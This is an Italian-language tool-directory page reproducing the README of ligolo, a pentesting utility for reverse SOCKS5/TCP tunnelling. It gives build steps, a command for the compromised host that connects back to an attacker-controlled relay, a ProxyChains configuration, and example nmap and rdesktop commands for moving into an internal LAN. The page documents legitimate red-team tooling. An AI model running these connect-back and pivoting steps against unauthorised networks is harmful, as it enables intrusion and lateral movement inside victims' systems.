Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
ligolo — Reverse Tunneling reso facile per pentester, da pentester https://sysdream.com/ | Kitploit
Strumenti/GitHubGitHub/sysdream/ligolo
Movimento LateralePenetration TestingRed Teaming
GitHubsysdream/ligolo

ligolo

Reverse Tunneling reso facile per pentester, da pentester https://sysdream.com/

Vedi Repository
1.8k227616 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Ligolo : Tunneling inverso reso facile per pentester, dai pentester

forthebadge forthebadge

Ligolo

Indice dei contenuti

  • Introduzione
  • Caso d'uso
  • Demo rapida
  • Prestazioni
  • Utilizzo
    • Setup / Compilazione
    • Come usare?
    • TL;DR
    • Opzioni
  • Funzionalità
  • Da fare
  • Licenza
  • Crediti

Introduzione

Ligolo è uno strumento semplice e leggero per stabilire tunnel SOCKS5 o TCP da una connessione inversa in completa sicurezza (certificato TLS con curva ellittica).

È paragonabile a Meterpreter con Autoroute + Socks4a, ma più stabile e veloce.

Caso d'uso

Hai compromesso un server Windows / Linux / Mac durante il tuo audit esterno. Questo server si trova all'interno di una rete LAN e vuoi stabilire connessioni ad altre macchine su questa rete.

Ligolo può configurare un tunnel per accedere alle risorse del server interno.

Demo rapida

Relay di una connessione RDP utilizzando Proxychains (WAN).

RDP

Prestazioni

Ecco uno screenshot di un speedtest tra due host a 100mb/s (ligolo / localrelay). Le prestazioni possono variare a seconda della configurazione di sistema e rete.

Speedtest

Utilizzo

Setup / Compilazione

Assicurati che Go sia installato e funzionante.

  1. Ottieni Ligolo e le dipendenze
cd `go env GOPATH`/src
git clone https://github.com/sysdream/ligolo
cd ligolo
make dep
  1. Genera certificati TLS auto-firmati (verranno inseriti nella cartella certs)
make certs TLS_HOST=example.com

NOTA: Puoi anche usare i tuoi certificati utilizzando l'opzione TLS_CERT del make quando chiami build. Esempio: make build-all TLS_CERT=certs/mycert.pem.

  1. Compila
  • 3.1. Per tutte le architetture
make build-all
  • 3.2. (oppure) Per l'architettura corrente
make build

Come usare?

Ligolo consiste di due moduli:

  • localrelay
  • ligolo

Localrelay è destinato ad essere lanciato sul server di controllo (il server attaccante).

Ligolo è il programma da eseguire sul computer target.

Per localrelay, puoi lasciare le opzioni predefinite. Ascolterà su ogni interfaccia sulla porta 5555 e aspetterà connessioni da ligolo (parametro -relayserver).

Per ligolo, devi specificare l'indirizzo IP del relay server (o del tuo server di attacco) utilizzando il parametro -relayserver ip:porta.

Puoi usare l'opzione -h per l'aiuto.

Una volta stabilita la connessione tra Ligolo e LocalRelay, un proxy SOCKS5 verrà configurato sulla porta TCP 1080 sul relay server (puoi cambiare l'indirizzo/porta TCP usando l'opzione -localserver).

Dopodiché, tutto ciò che devi fare è usare il tuo strumento preferito (Proxychains per esempio) ed esplorare la rete LAN del client.

TL;DR

Sul tuo server di attacco.

./bin/localrelay_linux_amd64

Sull'host compromesso.

> ligolo_windows_amd64.exe -relayserver LOCALRELAYSERVER:5555

Una volta stabilita la connessione, imposta i seguenti parametri nel file di configurazione di ProxyChains (sul server di attacco):

[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
socks5     127.0.0.1 1080

Approfittane.

$ proxychains nmap -sT 10.0.0.0/24 -p 80 -Pn -A
$ proxychains rdesktop 10.0.0.123

Opzioni

Opzioni di Localrelay:

Usage of localrelay:
  -certfile string
    	The TLS server certificate (default "certs/server.crt")
  -keyfile string
    	The TLS server key (default "certs/server.key")
  -localserver string
    	The local server address (your proxychains parameter) (default "127.0.0.1:1080")
  -relayserver string
    	The relay server listening address (the connect-back address) (default "0.0.0.0:5555")

Opzioni di Ligolo:

Usage of ligolo:
  -autorestart
    	Attempt to reconnect in case of an exception
  -relayserver string
    	The relay server (the connect-back address) (default "127.0.0.1:5555")
  -skipverify
    	Skip TLS certificate pinning verification
  -targetserver string
    	The destination server (a RDP client, SSH server, etc.) - when not specified, Ligolo starts a socks5 proxy server

Funzionalità

  • Tunnel TLS 1.3 con TLS pinning
  • Multipiattaforma (Windows / Linux / Mac / ...)
  • Multiplexing (1 connessione TCP per tutti i flussi)
  • Proxy SOCKS5 o relay semplice

Da fare

  • Migliore gestione dei timeout
  • Supporto UDP SOCKS5
  • Implementare mTLS

Licenza

GNU General Public License v3.0 (Vedi LICENSING).

Crediti

  • Nicolas Chatelain <n.chatelain -at- sysdream.com>

Sysdream

Scarica lo strumento